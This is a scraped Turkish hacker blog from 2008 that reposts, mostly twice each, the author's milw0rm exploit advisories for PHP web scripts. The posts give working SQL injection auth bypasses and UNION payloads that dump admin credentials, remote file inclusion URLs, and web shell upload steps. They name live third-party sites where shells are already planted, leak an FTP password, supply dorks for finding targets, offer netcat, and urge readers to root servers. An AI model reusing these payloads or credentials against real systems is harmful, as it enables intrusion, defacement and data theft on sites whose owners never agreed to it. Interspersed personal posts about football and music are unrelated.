Star Articles 6.0 Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7251
Discovered By: ZoRLu
expl:
http://script//authorphoto/user_name[id].php
example:
http://www.lcfarticles.com//authorphoto/zorlu40.php ( according to me you dont make hack this site )
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server fena deil )
hemen hacklemeyin arkadaslar serverý kurcalayIn bakIn misal:
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bir cok site var. ya rootlayýn yada tek tek cakIn config okuyun vs. serverdaki sitelerle ugrasmadan zone kasIlmaz ;)
http://www.lcfarticles.com//authorphoto/zorlu40.php?act=ls&d=%2Fhome%2Fkiddybab%2Fpublic_html%2F
bu serverdaki bir site icin:
ftp://ftp.ababy.com.au/ ( ftp pass ve username )
user: kiddybab
pass: KidEw1nk08
ne biliyim iste biseler yapmaya calIsIn amacIm yardImcı olmak yoksa isterseniz hemen hackleyin isterseniz kurcalayIn siz bilirsiniz ;)
first register for site
after login to site and edit profile ( direck lnk: http://www.lcfarticles.com/user.modify.profile.php )
click to gozat button and select your shell after upload you shell
more after go repat edit profile page and you look you photo. right click to you photo
select to properties copy photo link and paste you explorer.
go your shell
examp:
user: trt-turk@hotmail.com
passwd: zorlu1
login:
http://www.lcfarticles.com/user.login.php
shell:
http://www.lcfarticles.com//authorphoto/zorlu40.php
28 Kasım 2008 Cuma
27 Kasım 2008 Perşembe
25 Kasım 2008 Salı
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
FAQ Manager 1.2 (config_path) Remote File Inclusion Vulnerability
link: http://www.milw0rm.com/exploits/7229
link: http://www.milw0rm.com/exploits/7229
Discovered By: ZoRLu
file:
include/header.php
exp:
http://localhost/script/include/header.php?config_path=ZoRLu.txt?
Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities
Clean CMS 1.5 (Blind SQL Injection/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7228
link: http://www.milw0rm.com/exploits/7228
Discovered By: ZoRLu
exp for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
XSS for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=[XSS]
Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities
Chipmunk Topsites (Auth Bypass/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7227
link: http://www.milw0rm.com/exploits/7227
Discovered By: ZoRLu
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu ( or dont write anything )
note: generally admin name: admin
exploit for demo:
http://www.chipmunk-scripts.com/topsites/login.php
username: admin ' or ' 1=1--
passwd: ZoRLu ( or dont write anything )
or
username: zorlu ' or ' 1=1--
passwd: ZoRLu ( or dont write anything )
XSS:
http://www.arcade-classics.net/top100/index.php?start=[XSS]
Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability
Pie Web M{a,e}sher Mod Rss 0.1 Remote File Inclusion Vulnerability
link: http://www.milw0rm.com/exploits/7225
link: http://www.milw0rm.com/exploits/7225
Discovered By: ZoRLu
file: rss-0.1/lib/action/rss.php
c0de:
include_once("$lib/class/page.php");
include_once("$lib/share/link.php");
include_once("$lib/share/stdio.php");
include_once("$lib/share/string.php");
exp:
http://localhost/script/[pie installation]/lib/action/rss.php?lib=ZoRLu.txt?
24 Kasım 2008 Pazartesi
Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
Bandwebsite 1.5 (SQL/XSS) Multiple Remote Vulnerabilities
link: http://www.milw0rm.com/exploits/7215
Discovered By: ZoRLu
exploit:
http://localhost/script/lyrics.php?section=full&id=[SQL]
http://localhost/script/info.php?section=[XSS]
[SQL]
99999999+union+select+1,name,3,pass,5+from+admin--
example:
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
login:
http://www.caro-kunde.de/login.php
XSS:
http://www.caro-kunde.de/info.php?section=[XSS]
link: http://www.milw0rm.com/exploits/7215
Discovered By: ZoRLu
exploit:
http://localhost/script/lyrics.php?section=full&id=[SQL]
http://localhost/script/info.php?section=[XSS]
[SQL]
99999999+union+select+1,name,3,pass,5+from+admin--
example:
http://www.caro-kunde.de/lyrics.php?section=full&id=99999999+union+select+1,name,3,pass,5+from+admin--
login:
http://www.caro-kunde.de/login.php
XSS:
http://www.caro-kunde.de/info.php?section=[XSS]
23 Kasım 2008 Pazar
PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
PG Job Site (poll_view_id) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7202
Discovered By: ZoRLu
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
link: http://www.milw0rm.com/exploits/7202
Discovered By: ZoRLu
exploit for demo: ( you must login to site after you test this links. you look left for two link)
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=4 ( true )
http://www.jobsoftpro.com/demo/homepage.php?action=results&poll_ident=6&poll_view_id=6+and+substring(@@version,1,1)=5 ( false )
PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
PG Roomate Finder Solution (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7201
Discovered By: ZoRLu
dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/roommate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7201
Discovered By: ZoRLu
dork: "Powered by PG Roomate Finder Solution - roommate estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/roommate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
PG Real Estate (Auth Bypass) SQL Injection Vulnerability
PG Real Estate (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7200
Discovered By: ZoRLu
dork: "Powered by PG Real Estate Solution - real estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/realestate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7200
Discovered By: ZoRLu
dork: "Powered by PG Real Estate Solution - real estate web site design"
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
exploit for demo:
login: http://www.realtysoft.pro/realestate/demo/admin/index.php
username: admin ' or ' 1=1--
password: ZoRLu
lütfen demoları hacklemeyin - pls you dont make hack demos
ya arkadaşlar küçük bir ricam olacak demoları hacklemeyin ki yeni acıkları bulabilelim lütfen. şimdi demo hacklenince ben veya diğer arkadaşlarımız nerden scripti bulup test edecek ? diyceksiniz dork yok onuda sizler bulun. geçenlerde bir arkadaşla konuşuyorduk dorkları kendileri bulabiliyolarmış yani sizlerde bulabilirsiniz. demo hacklemek süper bir iş deil misal:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
bu sitenin serverın da yüzlerce site vardı madem hackliycektiniz onları hackleseydiniz demoya dokunmasaydınız. lütfen arkadaşlar bu konuda biraz hassas olalım.
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
bu sitenin serverın da yüzlerce site vardı madem hackliycektiniz onları hackleseydiniz demoya dokunmasaydınız. lütfen arkadaşlar bu konuda biraz hassas olalım.
getaphpsite Auto Dealers Remote File Upload Vulnerability
getaphpsite Auto Dealers Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7189
Discovered By: ZoRLu msn: trt-turk@hotmail.com
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/cardealers/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
link: http://www.milw0rm.com/exploits/7189
Discovered By: ZoRLu msn: trt-turk@hotmail.com
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/cardealers/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/cardealers/re_images/1227370217_logo_c.php
getaphpsite Real Estate Remote File Upload Vulnerability
getaphpsite Real Estate Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7188
Discovered By: ZoRLu
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/realty/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
link: http://www.milw0rm.com/exploits/7188
Discovered By: ZoRLu
first register to site
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
example for demo:
login: http://www.getaphpsite.com/demos/realty/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.getaphpsite.com/demos/realty/re_images/1227371905_logo_c.php
21 Kasım 2008 Cuma
20 Kasım 2008 Perşembe
18 Kasım 2008 Salı
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
Jadu Galaxies (categoryID) Blind SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
link: http://www.milw0rm.com/exploits/7144
Discovered By: ZoRLu
exploit for demo:
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=4 ( true )
http://www.jadu.co.uk/galaxies/site/scripts/documents.php?categoryID=2+and+substring(@@version,1,1)=3 ( false )
15 Kasım 2008 Cumartesi
mola : (
artık nete vs bir süreliğine ara veriyorum bug 45 te kaldı. inş nasip olurda dönersem kaldığım yerden devam edecem ama öncelikli olarak bu kpss işini halletmem lazım. ara ara nete girerim yine : ) hadi kolay gele by by
turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability
turnkeyforms Text Link Sales (id) XSS/SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7124
Discovered By: ZoRLu
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]
link: http://www.milw0rm.com/exploits/7124
Discovered By: ZoRLu
Exploit: sql inj
http://localhost/script/admin.php?a=users&id=[SQL]
[SQL]
999+union+select+1,user(),database(),version(),5,6,7--
sql for demo:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=999+union+select+1,user(),database(),version(),5,6,7--
xss:
http://demo.turnkeyforms.com/textlinkads/admin.php?a=users&id=[XSS]
X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability
X7 Chat 2.0.5 (Auth Bypass) SQL Injection Vulnerability
link: http://www.milw0rm.com/exploits/7123
Discovered By: ZoRLu
Exploit:
username: ZoRLu or anything write
password: ' or ' 1=1--
login for demo:
http://x7chat2demo.hostx7.com/
username: ZoRLu
password: ' or ' 1=1--
link: http://www.milw0rm.com/exploits/7123
Discovered By: ZoRLu
Exploit:
username: ZoRLu or anything write
password: ' or ' 1=1--
login for demo:
http://x7chat2demo.hostx7.com/
username: ZoRLu
password: ' or ' 1=1--
14 Kasım 2008 Cuma
GS Real Estate Portal US/International Module Multiple Vulnerabilities
GS Real Estate Portal US/International Module Multiple Vulnerabilities
link: http://www.milw0rm.com/exploits/7117
Discovered By: ZoRLu
Exploit 1: sql inj
http://localhost/script/email.php?AgentID=[SQL]
[SQL]
-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
sql for demo:
http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
Exploit 2: auth bypass
login: http://localhost/script/login.php
username: [real_admin_or_user_name] ' or ' 1=1--
password: ZoRLu
note: generally admin name: admin
bypass for demo:
login: http://hostnomi.net/int/login.php
admin: admin ' or ' 1=1--
passwd: ZoRLu
exploit 3: Rfu
you login to site and edit your profile upload your_shell.php
after right click to your logo and select properties. copy photo link.
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
edit profile: http://hostnomi.net/int/profile.php
shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
exploit 4: XSS
http://localhost/script/email.php?AgentID=&ListingID=[XSS]
xss for demo:
http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]
link: http://www.milw0rm.com/exploits/7117
Discovered By: ZoRLu
Exploit 1: sql inj
http://localhost/script/email.php?AgentID=[SQL]
[SQL]
-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
sql for demo:
http://hostnomi.net/int/email.php?AgentID=-47+union+select+1,2,3,4,5,6,7,8,9,10,concat(user(),0x3a,database(),0x3a,version()),12,13,14,15,16,17,18,19,20,21,22,23+from+admin--
Exploit 2: auth bypass
login: http://localhost/script/login.php
username: [real_admin_or_user_name] ' or ' 1=1--
password: ZoRLu
note: generally admin name: admin
bypass for demo:
login: http://hostnomi.net/int/login.php
admin: admin ' or ' 1=1--
passwd: ZoRLu
exploit 3: Rfu
you login to site and edit your profile upload your_shell.php
after right click to your logo and select properties. copy photo link.
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
edit profile: http://hostnomi.net/int/profile.php
shell: http://hostnomi.net/int/re_images/1226591775_logo_c.php ( no permission this demo server )
exploit 4: XSS
http://localhost/script/email.php?AgentID=&ListingID=[XSS]
xss for demo:
http://hostnomi.net/int/email.php?AgentID=&ListingID=[XSS]
netcat download
shell attığınızda root olabilmek için önce nolması lazım bir adet netcat : ) işte size netcat işinize yarar diye düşündüm
edit:
link yenilendi
//ZoRLu
TIKLA iNDiR
netcat.exe yi c:\windows\system32 buraya sallayın
edit:
link yenilendi
//ZoRLu
TIKLA iNDiR
netcat.exe yi c:\windows\system32 buraya sallayın
BosClassifieds hack video
yönetmen: ZoRLu : )
BosClassifieds md5 kırdıktan sonra napabiliriz küçük bir tavsiye mahiyetinde bir video md5 kırıp admin panele girdikten sonra shellimizi upload ediyoruz ama nasıl
TIKLA iZLE
( rar pass: z0rlu.blogspot.com )
BosClassifieds md5 kırdıktan sonra napabiliriz küçük bir tavsiye mahiyetinde bir video md5 kırıp admin panele girdikten sonra shellimizi upload ediyoruz ama nasıl
TIKLA iZLE
( rar pass: z0rlu.blogspot.com )
bu fakelerin modası geçmedi mi henüz : )
gecenler de bir mail aldım yok efendim hotmail ekibindenmiş güncelleme yapmalıymışım da oymuşda buymuşda : ) yahu arkadaş daha klass daha süper yöntemler çıktı hack için bari onları kullansana : ) hem mailimi hackleyip napacan ben trt-turk@hotmail.com u sadece msn olarak kullanıyorum yani kişi listesinden başka hiç bi halta dokunamazsın ki : ) hem gel insan gibi iste şifreyi vereyim msn listesi doldu zaten silmekten bi hal oldum :) he benim msn mi kimse hackleyemez de demiyorum buda bilinsin geçenlerde hacklenmişti bile bi tanesi : ) neyse uzun lafın kısası yemeyin böle emailleri yok live ekibi yok sifreni ver vs boş bunlar
ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
ScriptsFeed (SF) Real Estate Classifieds Software File Upload Vuln
link: http://www.milw0rm.com/exploits/7110
Discovered By: ZoRLu
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
link: http://www.milw0rm.com/exploits/7110
Discovered By: ZoRLu
Exploit:
http://localhost/script/re_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/re_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php
ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln
ScriptsFeed (SF) Auto Classifieds Software Remote File Upload Vuln
link: http://www.milw0rm.com/exploits/7111
Discovered By: ZoRLu
Exploit:
http://localhost/script/cars_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/cars_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
link: http://www.milw0rm.com/exploits/7111
Discovered By: ZoRLu
Exploit:
http://localhost/script/cars_images/[id]_logo_your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you go profile edit
profile: http://localhost/script/profile.php
and you upload your_shell.php right click to your logo and select properties copy link
paste your explorer go your_shell.php
your_shell.php path:
http://localhost/script/cars_images/[id]_logo_your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php
ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability
ScriptsFeed (SF) Recipes Listing Portal Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7112
Discovered By: ZoRLu
dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
link: http://www.milw0rm.com/exploits/7112
Discovered By: ZoRLu
dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) )
Exploit:
http://localhost/script/pictures/[id]your_shell.php
you register to site
register: http://localhost/script/register.php
after you login to site
login: http://localhost/script/login.php
more after you click to "Add a Recipe" and add recipe
and after click to "View your Recipes" click to you recipe open new page
right click to your photo. select properties copy photo lick
and paste your explorer go your shell
your_shell.php path:
http://localhost/script/pictures/[id]your_shell.php
rfu for demo:
user: zorlu
passwd: zorlu1
shell path:
http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php
example 2:
user: zorlu
passwd: zorlu1
shell:
http://onlineyemektarifi.com/pictures/1226598952c.php? ( hemen indexlemeyin kurcalayIn serverI )
misal:
http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
13 Kasım 2008 Perşembe
Kurtlar Vadisi Pusu 46. Bölüm Fragman
polat abimiz tam dosyaları teslim edip gönderdiği zaman süper bi süpriz ile karşılaşıyor. izleyin görün. biraz da bozuluyor herhalde : ) )
TIKLA iZLE
TIKLA iZLE
AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
AlstraSoft Web Host Directory (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7103
Discovered By: ZoRLu
Exploit:
username: ZoRLu
password: ' or ' 1=1--
admin login for demo:
http://www.hyperstop.com/demo/webhost/
username: ZoRLu
password: ' or ' 1=1--
link: http://www.milw0rm.com/exploits/7103
Discovered By: ZoRLu
Exploit:
username: ZoRLu
password: ' or ' 1=1--
admin login for demo:
http://www.hyperstop.com/demo/webhost/
username: ZoRLu
password: ' or ' 1=1--
AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
link: http://www.milw0rm.com/exploits/7102
Discovered By: ZoRLu
Exploit:
localhost/script/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
admin login for demo:
http://www.blizsoft.com/article/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
link: http://www.milw0rm.com/exploits/7102
Discovered By: ZoRLu
Exploit:
localhost/script/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
admin login for demo:
http://www.blizsoft.com/article/admin/admin.php
username: ' or ' 1=1--
password: ZoRLu
AlstraSoft SendIt Pro Remote File Upload Vulnerability
AlstraSoft SendIt Pro Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7101
Discovered By: ZoRLu
dork: "Powered by AlstraSoft SendIt Pro"
Exploit:
you save your shell like this: shell.php.pjpeg
warning: filetype not php.jpeg
like this: filetype: php.pjpeg
after you go site
Recipients' e-mail address: write anything
Select file : select your_shell.php.pjpeg
Your e-mail address: email
Message to send to recipient : write anything
and click to send button after you see link and clik to that link
you go your_shell.php.pjpeg :
localhost/script/send/files/[id]shell.php.pjpeg
example for demo:
http://www.blizsoft.com/send/files/84019shell.php.pjpeg
link: http://www.milw0rm.com/exploits/7101
Discovered By: ZoRLu
dork: "Powered by AlstraSoft SendIt Pro"
Exploit:
you save your shell like this: shell.php.pjpeg
warning: filetype not php.jpeg
like this: filetype: php.pjpeg
after you go site
Recipients' e-mail address: write anything
Select file : select your_shell.php.pjpeg
Your e-mail address: email
Message to send to recipient : write anything
and click to send button after you see link and clik to that link
you go your_shell.php.pjpeg :
localhost/script/send/files/[id]shell.php.pjpeg
example for demo:
http://www.blizsoft.com/send/files/84019shell.php.pjpeg
11 Kasım 2008 Salı
a.q gecenin bu saatinde ödev hazırlıyorum : (
a.q sanmayın öss yi kazanınca herşey tamam eğer öyle düşünüyorsanız avucunuzu yalarsınız bilesiniz. insan sanıyor üni. de rahat edecem ama nerde : ) gecenin 3 üne geliyor saat ben halen ödev yapıyorum. adaletin bu mu dünya ? : ) )
PHPStore Real Estate Remote File Upload Vulnerability
PHPStore Real Estate Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7085
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
---------------------------------------------
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
link: http://www.milw0rm.com/exploits/7085
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/re_images/[ID]_logo_your_shell.php
---------------------------------------------
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/realty/re_images/1226243945_logo_c.php
http://www.phpstore.info/demos/realty/re_images/ ( you look here and see shell 1226243945_logo_c.php )
PHPStore Complete Classifieds Script File Upload Vulnerability
PHPStore Complete Classifieds Script File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7084
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and Add Listing click open the new page upload logo (upload your_shell.php)
your_shell.php path:
localhost/script/yellow_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php
http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
link: http://www.milw0rm.com/exploits/7084
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and Add Listing click open the new page upload logo (upload your_shell.php)
your_shell.php path:
localhost/script/yellow_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell: ( not permission for demo server )
http://www.phpstore.info/demos/classifieds1/yellow_images/1226242317_logo_c.php
http://www.phpstore.info/demos/classifieds1/yellow_images/ ( you look here and see shell 1226242317_logo_c.php )
PHPStore PHP Job Search Script Remote File Upload Vulnerability
PHPStore PHP Job Search Script Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7083
Author: ZoRLu
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
link: http://www.milw0rm.com/exploits/7083
Author: ZoRLu
exploit:
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
you register site and this site questions your photo. you upload your_shell.php
you clikc to view resume and open new page ( direckt link: http://localhost/script/preview.php )
you must see your photo
and right click to your photo select to properites
after copy photo link and paste your explorer go your shell
your_shell.php
http://localhost/script/jobseekers/jobseeker_profile_images/[id]_offer_your_shel.php
---------------------------------------------
example for demo:
shell: ( not permission for demo server )
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/1226242993_offer_c.php
http://www.phpstore.info/demos/phpcareers/jobseekers/jobseeker_profile_images/ ( you look here and see shell 1226242993_offer_c.php )
PHPStore Car Dealers Remote File Upload Vulnerability
PHPStore Car Dealers Remote File Upload Vulnerability
link: http://www.milw0rm.com/exploits/7082
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/cars_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
link: http://www.milw0rm.com/exploits/7082
Author: ZoRLu
exploit:
first register to site
you add this code your shell to head
GIF89a;
example your_shell.php:
GIF89a;
...
...
...
?>
and save your_sheell.php
login to site and edit your profile
upload your_shell.php
your_shell.php path:
localhost/script/cars_images/[ID]_logo_your_shell.php
---------------------------------------------
example for demo:
login: http://www.phpstore.info/demos/cars/login.php
user: zorlu
passwd: zorlu1
shell:
http://www.phpstore.info/demos/cars/cars_images/1226241384_logo_c.php
9 Kasım 2008 Pazar
Galatasaray - fenerbahçe 4-1
ilk golü biz attık adamlar 1 e 4 attı hay a.q : ) neyse cimbomum ne diyelim geçmiş olsun canımız saolsun : ) ) yensen de yenilsen de bizim takımımızsın seni seviyoruz en büyük cimbom
Ali Kınık - Asın Beni
Ali Kınık'ın süper bir parçası tavsiye ederim dinlemenizi
"Hor görüldü sevdalarım"
"Vatan için kavgalarım"
"Ben küçülmeden yaşarım"
"isterseniz asın beni"
"Bir şafak vakti"
TIKLA iNDiR
"Hor görüldü sevdalarım"
"Vatan için kavgalarım"
"Ben küçülmeden yaşarım"
"isterseniz asın beni"
"Bir şafak vakti"
